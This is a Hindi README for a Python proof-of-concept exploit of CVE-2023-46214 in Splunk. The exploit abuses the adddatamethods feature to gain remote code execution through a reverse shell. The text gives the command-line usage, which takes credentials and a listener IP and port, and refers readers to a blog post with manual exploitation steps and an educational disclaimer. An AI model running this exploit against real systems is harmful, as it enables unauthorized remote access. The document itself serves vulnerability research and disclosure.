
CVE-2023-46214 के लिए Python-आधारित PoC जो रिवर्स शेल के माध्यम से रिमोट कोड निष्पादन प्राप्त करने के लिए Splunk की adddatamethods सुविधा का शोषण करता है।
प्रूफ ऑफ कॉन्सेप्ट एक्सप्लॉइट CVE-2023-46214, SVD-2023-1104 के लिए

Splunk इंस्टेंस URL, उपयोगकर्ता नाम, पासवर्ड, रिवर्स शेल IP और पोर्ट सभी कमांड-लाइन पैरामीटर के रूप में आवश्यक हैं। उदाहरण के लिए:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
मैंने एक ब्लॉग पोस्ट लिखी है जिसमें इस भेद्यता का पता लगाने के लिए अपनाई गई पद्धति का विवरण दिया गया है। यदि आपको स्क्रिप्ट के साथ कोई समस्या आ रही है, तो ब्लॉग सहायक हो सकती है क्योंकि इसमें शोषण के मैन्युअल चरणों का विवरण है।
इस रिपॉजिटरी में प्रदान की गई प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसका उद्देश्य किसी विशिष्ट भेद्यता को प्रदर्शित करना और संबंधित सुरक्षा जोखिमों को समझने में सहायता करना है।
इस स्क्रिप्ट का किसी भी अनधिकृत गतिविधि के लिए उपयोग, जिसमें अनधिकृत सिस्टम एक्सेस, अनधिकृत परीक्षण, या दुरुपयोग के अन्य रूप शामिल हैं लेकिन इन्हीं तक सीमित नहीं हैं, स्पष्ट रूप से निषिद्ध है।
इस रिपॉजिटरी के निर्माता और योगदानकर्ता इस स्क्रिप्ट के अनुचित उपयोग या इसके उपयोग से होने वाली किसी भी क्षति या हानि के लिए सभी दायित्व अस्वीकार करते हैं। इस स्क्रिप्ट का उपयोग करके, आप इसे जिम्मेदारी से और अपने जोखिम पर उपयोग करने के लिए सहमत होते हैं।